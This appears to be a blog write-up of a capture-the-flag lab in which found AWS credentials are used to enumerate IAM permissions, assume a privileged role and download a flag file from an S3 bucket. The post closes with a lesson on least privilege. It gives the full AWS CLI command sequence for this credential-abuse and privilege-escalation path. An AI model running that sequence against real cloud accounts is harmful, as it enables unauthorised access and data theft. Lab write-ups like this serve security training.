Advent of Cyber 2025 - Day 23 - AWS Security - S3cret Santa

 

☁️ Day 23: Reclaiming the Cloud – An AWS IAM Adventure ๐Ÿฐ๐Ÿ”

๐ŸŒŸ Introduction

Deep inside the Kingdom of Wareville, one of TBFC’s stealthiest elves pulled off an incredible infiltration ๐Ÿ•ต️‍♂️. Hopping quietly into Sir Carrotbane’s office, the elf discovered a shocking sight — cloud credentials casually lying on the desktop like forgotten carrots ๐Ÿฅ•๐Ÿ’ป.

The mission was clear:
๐Ÿ‘‰ Use these credentials
๐Ÿ‘‰ Regain access to TBFC’s cloud network
๐Ÿ‘‰ Uncover hidden secrets in the cloud ☁️

Let’s walk through how this cloud infiltration unfolded using AWS IAM and the AWS CLI ๐Ÿš€

๐ŸŽฏ Learning Objectives

By the end of this mission, we learned how to:

  • ๐Ÿง  Understand AWS accounts & IAM

  • ๐Ÿ” Enumerate permissions from an attacker’s perspective

  • ๐Ÿ’ป Use the AWS CLI

  • ๐ŸŽญ Assume roles to escalate privileges

  • ๐Ÿ“ฆ Access sensitive data from Amazon S3

๐Ÿ”Œ Lab Setup & AWS CLI Configuration

AWS allows programmatic access using:

  • Access Key ID

  • Secret Access Key

These credentials were already configured in:

~/.aws/credentials

To confirm if they worked, we used AWS STS:

aws sts get-caller-identity

✅ Result:

๐ŸŽ‰ The credentials were valid and belonged to:

sir.carrotbane

The elf was delighted — cloud access restored! ๐Ÿ˜„☁️

๐Ÿงฉ IAM Explained (Users, Groups, Roles & Policies)

๐Ÿ‘ค IAM Users

A user represents an individual identity with specific permissions.

➡️ Example: Sir Carrotbane

๐Ÿ‘ฅ IAM Groups

Groups simplify permission management by assigning policies to multiple users at once.

➡️ Example: Carrotbane’s army

๐ŸŽญ IAM Roles

Roles provide temporary permissions that can be assumed when needed.

➡️ Sir Carrotbane switching roles based on the battle ⚔️๐Ÿ›ก️

๐Ÿ“œ IAM Policies

Policies define:

  • What actions are allowed

  • ๐Ÿ“ Which resources

  • ๐Ÿ” Under what conditions

  • ๐Ÿ‘ค For whom

๐Ÿ’ก Correct Answer:
Policy is the IAM component that defines permissions.

๐Ÿ” Enumerating Sir Carrotbane’s Permissions

๐Ÿ‘ฅ Listing Users

aws iam list-users

๐Ÿ“œ Checking Inline Policies

aws iam list-user-policies --user-name sir.carrotbane

✔️ Found an inline policy!

๐Ÿ“Ž Attached Policies?

aws iam list-attached-user-policies --user-name sir.carrotbane

❌ None found.

๐Ÿ‘ฅ Group Membership?

aws iam list-groups-for-user --user-name sir.carrotbane

❌ Not part of any group.

๐Ÿง  Inspecting the Inline Policy

aws iam get-user-policy --policy-name SirCarrotbanePolicy --user-name sir.carrotbane

๐Ÿ”Ž The policy allowed:

  • Listing users, groups, roles

  • Reading IAM policies

  • Assuming roles using sts:AssumeRole ๐ŸŽฏ

๐Ÿ’ก Correct Answer:
SirCarrotbanePolicy

๐ŸŽญ Assuming Roles – The Turning Point

๐Ÿ” Enumerating Roles

aws iam list-roles

๐ŸŽ‰ Jackpot!
A role named bucketmaster could be assumed by sir.carrotbane.

๐Ÿ“œ Checking Role Policies

aws iam get-role-policy --role-name bucketmaster --policy-name BucketMasterPolicy

๐Ÿ”‘ Permissions unlocked:

  • s3:ListAllMyBuckets

  • s3:ListBucket

  • s3:GetObject

๐Ÿ’ก Correct Answer:
ListAllMyBuckets

๐Ÿ” Assuming the Bucketmaster Role

aws sts assume-role \
--role-arn arn:aws:iam::123456789012:role/bucketmaster \
--role-session-name TBFC

๐Ÿงพ Temporary credentials were generated:

  • AccessKeyId

  • SecretAccessKey

  • SessionToken

These were exported to the environment, officially upgrading our access ๐Ÿš€

๐Ÿ“ฆ Exploring Amazon S3

☁️ What is S3?

Amazon Simple Storage Service (S3) is cloud object storage used for:

  • ๐Ÿ“„ Documents

  • ๐Ÿ–ผ️ Images

  • ๐Ÿ“ฆ Backups

  • ๐Ÿงพ Logs

Everything is stored inside Buckets ๐Ÿชฃ

๐Ÿ“‹ Listing Buckets

aws s3api list-buckets

๐Ÿ‘€ A suspicious bucket appeared:

easter-secrets-123145

๐Ÿ“‚ Listing Objects

aws s3api list-objects --bucket easter-secrets-123145

๐ŸŽฏ A file stood out:

cloud_password.txt

๐Ÿ“ฅ Downloading the Secret File

aws s3api get-object \
--bucket easter-secrets-123145 \
--key cloud_password.txt cloud_password.txt

๐Ÿ Mission Complete – Secret Revealed ๐ŸŽ‰

๐Ÿ“„ Contents of cloud_password.txt:

THM{more_like_sir_cloudbane}

๐Ÿ’ก Correct Answer confirmed!

๐Ÿง  Final Thoughts

This lab perfectly demonstrates how misconfigured IAM permissions and role assumption can lead to serious cloud security breaches ☁️⚠️.

A single forgotten credential turned into:

  • IAM enumeration ๐Ÿ”

  • Role escalation ๐ŸŽญ

  • Sensitive data exfiltration ๐Ÿ“ฆ

๐Ÿ›ก️ Lesson learned:

Least privilege and proper IAM configuration are critical in cloud security.

Comments

Post a Comment

Popular Posts